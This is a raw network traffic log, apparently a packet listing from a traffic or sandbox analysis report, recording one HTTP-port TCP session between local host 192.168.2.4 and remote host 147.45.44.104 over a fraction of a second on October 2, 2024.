Oct 2, 2024 09:41:04.758021116 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.758444071 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758460045 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758475065 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758485079 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.758505106 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758521080 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758531094 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.758537054 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758554935 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758562088 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.758667946 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758683920 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758693933 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.758702993 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758721113 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758728027 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.758738995 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758757114 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758766890 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.758775949 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758801937 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.758825064 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758868933 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758884907 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758894920 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.758900881 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758918047 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758928061 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.758934975 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758950949 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758960009 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.758968115 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758987904 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.758994102 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.759185076 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.759402037 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759428978 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759455919 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.759457111 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759475946 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759500980 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.759510040 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759526014 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759634972 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759661913 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.759768009 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759784937 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759795904 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.759800911 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759818077 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759833097 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759844065 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.759850979 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759855032 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.759881020 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759896994 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759910107 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.759922981 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759938955 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759958029 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759962082 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.759975910 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.759985924 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.759995937 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760060072 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760077000 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760085106 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.760092974 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760103941 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.760112047 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760128975 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760138035 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.760145903 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760164022 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760174036 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.760180950 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760199070 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760226011 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.760291100 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.760612011 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760627985 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760646105 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760670900 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.760674953 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760693073 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760710001 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760727882 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760751963 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.760799885 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760816097 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760838032 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760863066 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.760868073 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760886908 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760895967 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.760902882 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760921955 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.760930061 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.761056900 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761073112 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761089087 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761104107 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761116028 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.761120081 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761126995 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.761137962 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761154890 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761162996 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.761171103 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761188030 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761195898 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.761569977 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761584997 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761596918 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.761600971 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761626959 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.761637926 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761653900 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761672020 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761681080 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.761697054 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761713028 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761723995 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.761730909 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761755943 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.761784077 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761815071 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761830091 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761841059 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.761845112 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761862993 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.761872053 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.761957884 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.761986971 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762003899 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762018919 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762032032 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.762036085 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762053013 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762062073 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.762070894 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762088060 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762094975 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.762104034 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762123108 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762130022 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.762151003 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762167931 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762177944 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.762183905 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762201071 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762209892 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.762218952 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762236118 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762244940 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.762253046 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762279034 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.762299061 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762315989 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762332916 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762355089 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762370110 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762381077 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.762387037 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762403011 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762414932 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.762419939 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762437105 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.762444973 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.762517929 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.798185110 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.798218012 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.798270941 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.798302889 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.798322916 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.798357964 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.798389912 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.798420906 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.798424959 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.798455954 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.798460007 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.798494101 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.798522949 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.798527002 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.798563004 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.798593044 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.798597097 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.798634052 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.798664093 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.798671007 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.799526930 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.799566031 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.799571991 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.799642086 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.799674034 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.799696922 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.799753904 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.799755096 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.799791098 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.799846888 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.799876928 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.799880028 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.799942970 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.799973965 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.799978018 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800009012 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800039053 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.800052881 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800107002 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800137997 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.800141096 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800175905 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800205946 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.800209999 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800246000 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800276041 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.800297976 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800339937 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800369978 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.800391912 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800446033 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800474882 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.800481081 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800534010 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800564051 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.800566912 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800601959 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800631046 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800632954 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.800666094 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800698996 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.800699949 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800734997 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800765038 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.800791979 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800828934 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800858021 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.800864935 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800899029 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.800929070 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.800961971 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801016092 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801045895 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.801049948 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801084042 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801114082 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.801116943 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801156044 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801187992 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.801191092 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801223993 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801253080 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.801258087 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801292896 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801321983 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.801327944 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801379919 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801409960 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.801414967 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801448107 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801477909 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.801481009 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801517010 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801547050 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.801554918 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801589012 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801619053 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.801623106 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801657915 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801697969 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801702976 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.801731110 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801760912 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.801767111 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801800966 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801831007 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.801834106 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801863909 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801892996 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.801898956 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801933050 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.801964045 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.801968098 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802000999 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802030087 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.802032948 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802067995 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802098036 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.802100897 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802134991 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802165031 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.802169085 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802203894 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802232981 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.802236080 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802270889 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802299976 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.802304029 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802344084 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802371979 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802372932 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.802407980 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802438974 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.802443027 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802476883 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802506924 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.802510977 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802544117 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802572966 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.802577019 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802612066 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802640915 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.802644014 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802678108 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802709103 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.802711010 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802747011 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802768946 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.802779913 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802814007 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802846909 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802880049 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802911043 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.802911043 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.802912951 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802947998 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.802982092 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.803013086 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.803041935 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.803045988 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.803081036 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.803111076 CEST	49734	80	192.168.2.4	147.45.44.104
